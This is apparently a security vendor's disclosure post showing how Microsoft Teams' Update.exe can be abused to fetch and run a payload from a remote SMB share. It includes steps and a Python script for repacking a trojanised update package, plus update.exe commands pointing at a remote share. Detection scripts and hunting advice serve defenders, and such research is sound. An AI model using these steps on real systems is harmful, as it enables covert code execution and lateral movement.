Microsoft Teams Updater Living off the Land


During the COVID-19 pandemic, use of video conferencing solutions has grown sharply, and Trustwave SpiderLabs is exercising extra vigilance in monitoring video conferencing traffic. During our threat hunting we observed a large volume of Microsoft Teams updater traffic. Because that traffic is so noisy, malicious traffic hiding in it could escape an analyst's view, or the updater could even be added to an allow list of applications that are no longer monitored at all.

Because of this, I reviewed the previous findings on Microsoft Teams code execution and found that the issue was fixed, but not completely.


My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wished. This technique is typically known as Living Off the Land and is especially dangerous because it uses known, common software to download malware.

The patch previously provided for Teams restricted its ability to update via a URL. Instead, the updater only allows local connections, via a share or local folder, as the source of product updates.

Initially, when I observed this, I figured it could still be used as a technique for lateral movement; however, I found the added limitations could be easily bypassed by pointing the updater at a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, Microsoft Teams Updater only allows local network paths as an update source. It detects the strings "http/s", ":" and "/" and port numbers in the update location, blocks the update, and logs the activity in %localappdata%\Microsoft\Teams\SquirrelSetup.log.




It allows share access in the local UNC format: \\server\

To exploit this, an attacker would need to:

  1. Get the payload onto an open shared folder inside the network
  2. Make the victim machine fetch the payload from that share

It looks like a complicated scenario with a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote share rather than a local one. This lets them download and execute the remote payload directly, without first staging it on a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command, and the Microsoft Teams Updater "Update.exe" downloaded the remote payload and executed it directly.

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint


Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first.

Payload creation:

  1. Extract any nupkg package; in my example, Teams-
     1. Go to %localappdata%/Microsoft/Teams/packages to pick the Microsoft Teams pre-built package
  2. Go to Teams-\lib\net45 and drop your shellcode as 'squirrel.exe', then compress the complete folder as 'Teams-'
  3. Calculate the metadata with the command:
     sha1sum Teams- && wc -c < Teams-

     resulting in the output:
     fa8b87f0b995498a6e890c832dcaf968997608d4 Teams- 4695

  4. Create a file named RELEASES, paste the above output into it and save.
  5. The result is a main directory containing two files: Teams- and RELEASES.
  6. Upload those two files to the remote Samba server:
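The packaging steps above (repack the .nupkg with a replaced lib\net45\squirrel.exe, then emit the "sha1 filename size" line that RELEASES must contain) are scripted below as an added example; this is not code from the original post or from the Squirrel/Teams projects. It runs on a constructed stand-in package with placeholder bytes, not a real Teams package or shellcode; the package name Teams-1.0.0-full.nupkg is hypothetical because the post elides the version. The verify_releases function is the defensive counterpart: it recomputes size and SHA-1 for every RELEASES entry, which is the same size-and-hash check the hunting recommendations later ask for.

```python
import hashlib
import re
import tempfile
import zipfile
from pathlib import Path

# A RELEASES entry as the post shows it: "<sha1> <package file name> <size in bytes>"
RELEASE_LINE = re.compile(r"^([0-9A-Fa-f]{40})\s+(\S+)\s+(\d+)\s*$")
# Entry inside the .nupkg (a plain zip) that the post replaces with the payload
SQUIRREL_ENTRY = "lib/net45/squirrel.exe"


def repack_nupkg(src_nupkg, dst_nupkg, replacement_exe, entry=SQUIRREL_ENTRY):
    """Steps 1-2: copy every entry of the original package into a new one,
    swapping only lib/net45/squirrel.exe for the supplied bytes."""
    replaced = False
    with zipfile.ZipFile(src_nupkg) as src, \
         zipfile.ZipFile(dst_nupkg, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if name.replace("\\", "/").lower() == entry.lower():
                dst.writestr(name, replacement_exe)
                replaced = True
            else:
                dst.writestr(name, src.read(name))
    if not replaced:
        raise ValueError(f"{entry} not present in {src_nupkg}")
    return Path(dst_nupkg)


def release_entry(nupkg):
    """Step 3: the same triple that 'sha1sum <pkg> && wc -c < <pkg>' prints."""
    pkg = Path(nupkg)
    data = pkg.read_bytes()
    return f"{hashlib.sha1(data).hexdigest()} {pkg.name} {len(data)}"


def write_releases(share_dir):
    """Steps 4-5: one entry per package, saved as RELEASES next to the packages."""
    share_dir = Path(share_dir)
    lines = [release_entry(p) for p in sorted(share_dir.glob("*.nupkg"))]
    (share_dir / "RELEASES").write_text("\n".join(lines) + "\n")
    return lines


def verify_releases(share_dir):
    """Defensive check: recompute size and SHA-1 for every RELEASES entry and
    return what does not match. An empty list means the folder is self-consistent."""
    share_dir = Path(share_dir)
    problems = []
    for line in (share_dir / "RELEASES").read_text().splitlines():
        m = RELEASE_LINE.match(line)
        if not m:
            problems.append(("malformed", line))
            continue
        sha1, name, size = m.groups()
        pkg = share_dir / name
        if not pkg.exists():
            problems.append(("missing", name))
            continue
        data = pkg.read_bytes()
        if len(data) != int(size):
            problems.append(("size", name))
        elif hashlib.sha1(data).hexdigest().lower() != sha1.lower():
            problems.append(("sha1", name))
    return problems


def demo():
    """Run the whole procedure on constructed data in a temporary directory
    and return the pieces worth checking."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        original = tmp / "Teams-original.nupkg"      # constructed stand-in, not a real Teams package
        with zipfile.ZipFile(original, "w") as z:
            z.writestr("Teams.nuspec", "<package/>")
            z.writestr("lib/net45/squirrel.exe", b"original squirrel")
            z.writestr("lib/net45/Teams.exe", b"original app")
        share = tmp / "payloadFolder"                 # what \\remoteserver\payloadFolder would hold
        share.mkdir()
        pkg_name = "Teams-1.0.0-full.nupkg"           # hypothetical name; the post elides the version
        repack_nupkg(original, share / pkg_name, b"PLACEHOLDER payload bytes")
        with zipfile.ZipFile(share / pkg_name) as z:
            swapped = z.read("lib/net45/squirrel.exe")
        lines = write_releases(share)
        clean = verify_releases(share)
        # Tamper with the package after RELEASES was produced: verification must now fail.
        (share / pkg_name).write_bytes(b"x" * 10)
        return {"swapped": swapped, "lines": lines, "clean": clean,
                "tampered": verify_releases(share), "pkg_name": pkg_name}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Only the size and SHA-1 in RELEASES tie the updater to the package, so any package whose bytes match its RELEASES line is accepted; that is why the post's swap of squirrel.exe goes through, and why a defender can only catch a trojanised package by comparing it against a known-good hash rather than against RELEASES.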




Since it is a Samba server, it first needs to be authenticated to from the Windows "Run" dialog.

Steps to Reproduce:

  1. Go to the target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the command below:
     update.exe --update=[Samba server path containing the above two files]
     e.g. update.exe --update=\\remoteserver\payloadFolder

After a few seconds (wait 10-15 seconds), the payload is downloaded and executed by Microsoft Teams.

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:


Proof of concept:


  • Microsoft Teams Update.exe acts as a LOLBin (Living off the Land binary)
  • Since the installation is in the local user AppData folder, no privileged access is needed
  • Attackers can use this to masquerade their traffic (especially for lateral movement)

Trustwave reached out to Microsoft on this issue and they responded:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for --update because we have customers that apparently rely on this (e.g. folder redirection)."

Trustwave Recommendations

From the threat hunting perspective:

  1. Use EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the file size; use it to differentiate trojanised squirrels from the legitimate squirrel.exe
     • If you are dealing with Microsoft Teams "update.exe", validate its size and hash and hunt for any anomalies
  3. Investigate outgoing SMB connections, especially from the Microsoft Teams updater update.exe, or filter SMB connections entirely at the perimeter if they are unnecessary
  4. Ask the customer or IT for any security exclusions placed on Microsoft Teams packages and review the changes applied
  5. IT should install Microsoft Teams under the "Program Files" folder so an attacker cannot drop and execute a remote payload; this can be done by Group Policy
  6. Disable any kind of update mechanism and set a policy that updates are pushed only by the IT team
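Recommendations 1 and 3 come down to triaging update.exe command lines. The script below is an added example, not Trustwave's or Microsoft's code: it pulls the --update / --updateRollback source out of process-creation events and classifies it the way the post's observations suggest, treating a URL as blocked by the patch, a UNC path to a known file server and the redirected ...\AppData\Roaming\Microsoft\Teams\DownloadedUpdate folder as the expected folder-redirection case, and any other SMB server (or a raw IP literal) as suspicious. The event records, host names and the KNOWN_FILESERVERS allow list are constructed for the example; fill the allow list from your own inventory.

```python
import ipaddress
import re

# Assumption: file servers that legitimately host redirected user profiles.
KNOWN_FILESERVERS = {"fileshare", "fileshare01"}
# Legitimate events in the post all end in the redirected Teams download folder.
EXPECTED_SUFFIX = r"\appdata\roaming\microsoft\teams\downloadedupdate"

# Both "--update=<src>" and "--update <src>" forms occur in the post's examples.
UPDATE_ARG = re.compile(r"--(update|updateRollback)(?:=|\s+)(\S+)", re.IGNORECASE)
UNC = re.compile(r"^\\\\([^\\]+)(?:\\(.*))?$")
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def extract_update_target(cmdline):
    """Return (switch, source) or (None, None) when no update source is given."""
    m = UPDATE_ARG.search(cmdline)
    if not m:
        return None, None
    return m.group(1).lower(), m.group(2).strip('"')


def classify_target(target):
    """Classify an update source as the patched updater and the post describe it."""
    if URL_SCHEME.match(target):
        return "blocked_url", "URL source; the patched updater refuses it and logs to SquirrelSetup.log"
    m = UNC.match(target)
    if not m:
        return "local_path", "local folder; payload would have to be staged on the host first"
    server, rest = m.group(1), m.group(2) or ""
    try:
        ipaddress.ip_address(server)
        return "suspicious_unc", f"update source is a raw IP literal ({server}), not a named file server"
    except ValueError:
        pass
    known = server.lower() in KNOWN_FILESERVERS
    expected_folder = ("\\" + rest.lower().rstrip("\\")).endswith(EXPECTED_SUFFIX)
    if known and expected_folder:
        return "expected_unc", "known file server and the redirected DownloadedUpdate folder"
    if known:
        return "review_unc", f"known file server {server} but an unusual folder"
    return "suspicious_unc", f"unknown SMB server {server}; possible remote Samba share"


def triage(events):
    """Run over process-creation records; only update.exe launches are considered."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith(r"\update.exe"):
            continue
        switch, target = extract_update_target(ev["cmdline"])
        if switch is None:
            verdict, why = "benign", "no --update/--updateRollback source given"
        else:
            verdict, why = classify_target(target)
        findings.append((ev["host"], switch or "-", verdict, why))
    return findings


# Constructed process-creation records (not real telemetry); the three patterns
# mirror the legitimate events, the post's PoC command and the pre-patch URL case.
TEAMS_IMAGE = r"C:\Users\jdoe\AppData\Local\Microsoft\Teams\Update.exe"
SAMPLE_EVENTS = [
    {"host": "WS01", "image": TEAMS_IMAGE,
     "cmdline": r"Update.exe --update \\fileshare\profiles\jdoe\AppData\Roaming\Microsoft\Teams\DownloadedUpdate"},
    {"host": "WS01", "image": TEAMS_IMAGE, "cmdline": "Update.exe --update"},
    {"host": "WS02", "image": TEAMS_IMAGE, "cmdline": r"Update.exe --update=\\remoteserver\payloadFolder"},
    {"host": "WS03", "image": TEAMS_IMAGE, "cmdline": r"Update.exe --updateRollback=\\203.0.113.7\payloadFolder"},
    {"host": "WS04", "image": TEAMS_IMAGE, "cmdline": "Update.exe --update=http://203.0.113.7/payload"},
    {"host": "WS05", "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

if __name__ == "__main__":
    for host, switch, verdict, why in triage(SAMPLE_EVENTS):
        print(f"{host:5} {switch:15} {verdict:15} {why}")
```

Pair the command-line verdicts with the SMB network telemetry from recommendation 3: a suspicious_unc verdict on the endpoint plus an outbound TCP/445 connection from update.exe to the same server is the combination this technique produces, and an internal file server that never saw the host's profile before is the review_unc case worth a closer look.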

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans in response to global cyber events, and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.